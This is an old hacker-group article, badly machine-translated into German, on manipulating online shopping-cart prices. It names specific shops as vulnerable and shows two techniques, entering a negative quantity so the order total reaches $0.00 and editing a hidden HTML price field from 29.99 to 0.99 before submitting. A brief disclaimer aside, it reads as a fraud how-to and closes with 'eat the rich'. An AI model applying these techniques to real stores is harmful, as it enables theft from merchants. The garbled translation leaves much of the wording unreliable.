Manipulieren der Preis der Waren in einigen Einkaufswagen

################################################## ################################
@ @
@ :: LwB Security Team :: @
@ @
################################################## ################################
# -written Von Durito #
# -E-Mail: [email protected] #
# -http: //www.lwbteam.org #
# -date: 28.01.2004 #
# -comments: Die Information wird nur Referenz zur Verfügung gestellt und ist auf Platz # betrachtet
# Als Vorteil für Administratoren. Dieser Artikel ist nicht #
# Eine Anleitung zum Handeln. Wir sind nicht verantwortlich für Schäden #
# Perfekte Leser dieses Artikels, und für illegal #
# Verwenden Sie die Informationen , die uns zur Verfügung gestellt #
################################################## ################################

- = Manipulation des Preises von Waren in einigen Einkaufswagen = -
************************************************** ******

Die Sicherheitslücke, die ich möchte Ihnen heute sagen, ist nicht neu, aber trotz dieser,
Einige neue E-Commerce - Systemen, die auf dem Netzwerk anfällig für sie erscheinen.

Ich werde mit einem alten Fehler beginnen, das liegt in der Tatsache , dass die Skript - Einkaufswagen
Es ist nicht filtern , um die Zeichen Anzahl der gekauften Waren. Ein markantes Beispiel für diese Verwundbarkeit
Es gibt uns einen Einkaufswagen mit http://www.memoryworld.net.
Nehmen wir an, dass wir aus dem Katalog der Produkte Compactflash - Karte wählen (3.3 / 5 V) 128M
- Compactflash - Karte (3.3 / 5V ) 128M MEMORY CARD für $ 55,00 für 1 Stück.
In unserem Warenkorb Produkt ist, und wir können es bezahlen. Aber lassen Sie uns sagen , dass wir
Wir haben uns entschlossen , mich einer Compactflash - Karte (3.3 / 5 V) zu bestellen 128M - COMPACT FLASH
CARD (3.3 / 5 V) 128M MEMORY CARD, nur jetzt im Fenster setzen wir die Anzahl der Waren
nicht 1 und 1. Als Ergebnis Einkaufswagen mit Waren basierend uns bitten zu zahlen
$ 55,00 - 55,00 $ = 0,00 $
So:

Beschreibung Menge Preis Gesamtpreis
Peripheriegeräte - Compactflash - Karte (3.3 / 5 V) 128M - Compactflash - Karte (3.3 / 5 V)
128M MEMORY CARD -1 $ 55,00 ($ 55.00 Weitere Zimmerinformationen)
Peripheriegeräte - Compactflash - Karte (3.3 / 5 V) 128M - Compactflash - Karte (3.3 / 5 V)
128M Speicherkarte 1 $ 55,00 $ 55,00
Gesamt $ 0.00

Natürlich für 0,00 $ nein 2 Compactflash - Karte werden Sie nicht senden, aber wenn Sie sich nähern
die Sache richtig, dann grundsätzlich den Preis der Waren zu reduzieren real ist.

Ein zweites Beispiel für schlecht geschriebene E-Shop LKW gibt uns eine
http://ssl.adgrafix.com/cgi-bin/checkitout/checkitout.cgi?theorangSTORE:CKIE:home+
In diesem Fall wird der Preis der Ware in den versteckten html-Codefelder registriert und kann geändert werden.
Das Stück Code:
---------------
<Td valign = top width = "80%">
<FONT face = Arial, Helvetica Farbe = schwarz> Kalifornien Valencia Orangen </ FONT>
<Input type = hidden value = " California Valencia Orangen" name = name> <BR>
<FONT face = Arial, Helvetica Farbe = schwarz>
<B> 29,99 $ Neuer niedriger Preis Inklusive Standard S & amp ;. H </ B>
<Input type = hidden value = " 29.99 New Niedriger Preis Inklusive Standard S & amp; H."
name = Preis> </ FONT>
<FONT face = Arial, Helvetica Farbe = schwarz size = -1> <BR>
<FONT face = Arial, Helvetica Farbe = schwarz size = -1> <center>
<Font color = # 389c38 size = 4>
<B> <font color = # ff0000 size = 4>
Wir werden unsere CA Valencia Orangen ausliefern jetzt bis September !! Bestellen Sie noch heute !!
</ FONT> </ center> </ B> </ FONT>
----------------
Dies ist eine versteckte Linie mit dem Preis:
------
<Input type = hidden value = " 29.99 New Niedriger Preis Inklusive Standard S & amp; H."
name = Preis>
------
es kann zu übermitteln:
---
<Input type = hidden value = " 0.99 Neu Niedrig Preis Inklusive Standard S & amp; H."
name = Preis>

Und die Transaktion zu diesem Preis geht.

Ihr Fehler Durito.
_________________
ESSEN SIE DIE REICHEN!